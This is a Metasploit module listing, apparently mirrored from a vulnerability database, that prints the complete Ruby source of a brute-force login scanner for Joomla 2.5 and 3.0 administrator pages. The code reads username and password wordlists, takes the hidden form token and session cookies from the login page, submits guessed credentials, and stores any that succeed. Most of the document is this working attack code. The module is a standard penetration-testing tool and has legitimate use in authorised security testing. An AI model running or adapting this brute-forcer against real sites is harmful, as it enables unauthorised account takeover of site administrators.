Joomla Bruteforce Login Utility

2014-07-18T04:49:25
ID MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Joomla Bruteforce Login Utility',
      'Description'    => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',
      'Author'         => 'luisco100[at]gmail.com',
      'References'     =>
        [
          ['CVE', '1999-0502'] # Weak password Joomla
        ],
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        OptPath.new('USERPASS_FILE', [false, 'File containing users and passwords separated by space, one pair per line',
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')]),
        OptPath.new('USER_FILE', [false, 'File containing users, one per line',
          File.join(Msf::Config.data_directory, 'wordlists', "http_default_users.txt")]),
        OptPath.new('PASS_FILE', [false, 'File containing passwords, one per line',
          File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')]),
        OptString.new('AUTH_URI', [true, 'The URI to authenticate against', '/administrator/index.php']),
        OptString.new('FORM_URI', [true, 'The FORM URI to authenticate against' , '/administrator']),
        OptString.new('USER_VARIABLE', [true, 'The name of the variable for the user field', 'username']),
        OptString.new('PASS_VARIABLE', [true, 'The name of the variable for the password field' , 'passwd']),
        OptString.new('WORD_ERROR', [true, 'The word of message for detect that login fail', 'mod-login-username'])
      ])

    register_autofilter_ports([80, 443])
  end

  def find_auth_uri
    if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0
      paths = [datastore['AUTH_URI']]
    else
      paths = %w(
        /
        /administrator/
      )
    end

    paths.each do |path|
      begin
        res = send_request_cgi(
          'uri'    => path,
          'method' => 'GET'
        )
      rescue ::Rex::ConnectionError
        next
      end

      next unless res

      if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/
        path = res.headers['Location']
        vprint_status("#{rhost}:#{rport} - Following redirect: #{path}")
        begin
          res = send_request_cgi(
            'uri'     => path,
            'method'  => 'GET'
          )
        rescue ::Rex::ConnectionError
          next
        end
        next unless res
      end

      return path
    end

    nil
  end

  def target_url
    proto = 'http'
    if rport == 443 || ssl
      proto = 'https'
    end
    "#{proto}://#{rhost}:#{rport}#{@uri}"
  end

  def run_host(ip)
    vprint_status("#{rhost}:#{rport} - Searching Joomla authentication URI...")
    @uri = find_auth_uri

    unless @uri
      vprint_error("#{rhost}:#{rport} - No URI found that asks for authentication")
      return
    end

    @uri = "/#{@uri}" if @uri[0, 1] != '/'

    vprint_status("#{target_url} - Attempting to login...")

    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: (ssl ? 'https' : 'http'),
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: DateTime.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def do_login(user, pass)
    vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'")
    response  = do_web_login(user, pass)
    result = determine_result(response)

    if result == :success
      print_good("#{target_url} - Successful login '#{user}' : '#{pass}'")
      report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)
      return :abort if datastore['STOP_ON_SUCCESS']
      return :next_user
    else
      vprint_error("#{target_url} - Failed to login as '#{user}'")
      return
    end
  end

  def do_web_login(user, pass)
    user_var = datastore['USER_VARIABLE']
    pass_var = datastore['PASS_VARIABLE']

    referer_var = "http://#{rhost}/administrator/index.php"

    vprint_status("#{target_url} - Searching Joomla Login Response...")
    res = login_response

    unless res && res.code = 200 && !res.get_cookies.blank?
      vprint_error("#{target_url} - Failed to find Joomla Login Response")
      return nil
    end

    vprint_status("#{target_url} - Searching Joomla Login Form...")
    hidden_value = get_login_hidden(res)
    if hidden_value.nil?
      vprint_error("#{target_url} - Failed to find Joomla Login Form")
      return nil
    end

    vprint_status("#{target_url} - Searching Joomla Login Cookies...")
    cookie = get_login_cookie(res)
    if cookie.blank?
      vprint_error("#{target_url} - Failed to find Joomla Login Cookies")
      return nil
    end

    vprint_status("#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )")
    res = send_request_login(
      'user_var'     => user_var,
      'pass_var'     => pass_var,
      'cookie'       => cookie,
      'referer_var'  => referer_var,
      'user'         => user,
      'pass'         => pass,
      'hidden_value' => hidden_value
    )

    if res
      vprint_status("#{target_url} - Login Response #{res.code}")
      if res.redirect? && res.headers['Location']
        path = res.headers['Location']
        vprint_status("#{target_url} - Following redirect to #{path}...")

        res = send_request_raw(
          'uri'     => path,
          'method'  => 'GET',
          'cookie' => "#{cookie}"
        )
      end
    end

    return res
    rescue ::Rex::ConnectionError
      vprint_error("#{target_url} - Failed to connect to the web server")
      return nil
  end

  def send_request_login(opts = {})
    res = send_request_cgi(
      'uri'     => @uri,
      'method'  => 'POST',
      'cookie'  => "#{opts['cookie']}",
      'headers' =>
        {
          'Referer' => opts['referer_var']
        },
      'vars_post' => {
        opts['user_var']     => opts['user'],
        opts['pass_var']     => opts['pass'],
        'lang'               => '',
        'option'             => 'com_login',
        'task'               => 'login',
        'return'             => 'aW5kZXgucGhw',
        opts['hidden_value'] => 1
      }
    )

    res
  end

  def determine_result(response)
    return :abort unless response.kind_of?(Rex::Proto::Http::Response)
    return :abort unless response.code

    if [200, 301, 302].include?(response.code)
      if response.to_s.include?(datastore['WORD_ERROR'])
        return :fail
      else
        return :success
      end
    end

    :fail
  end

  def login_response
    uri = normalize_uri(datastore['FORM_URI'])
    res = send_request_cgi!('uri' => uri, 'method' => 'GET')

    res
  end

  def get_login_cookie(res)
    return nil unless res.kind_of?(Rex::Proto::Http::Response)

    res.get_cookies
  end

  def get_login_hidden(res)
    return nil unless res.kind_of?(Rex::Proto::Http::Response)

    return nil if res.body.blank?

    vprint_status("#{target_url} - Testing Joomla 2.5 Form...")
    form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)

    if form.length == 1  # is not Joomla 2.5
      vprint_status("#{target_url} - Testing Form Joomla 3.0 Form...")
      form = res.body.split(/<form action=([^\>]+) method="post" id="form-login" class="form-inline"\>(.*)<\/form>/mi)
    end

    if form.length == 1 # is not Joomla 3
      vprint_error("#{target_url} - Last chance to find a login form...")
      form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
    end

    begin
      input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
      input_id = input_hidden[7].split("\"")
    rescue NoMethodError
      return nil
    end

    valor_input_id = input_id[1]

    valor_input_id
  end
end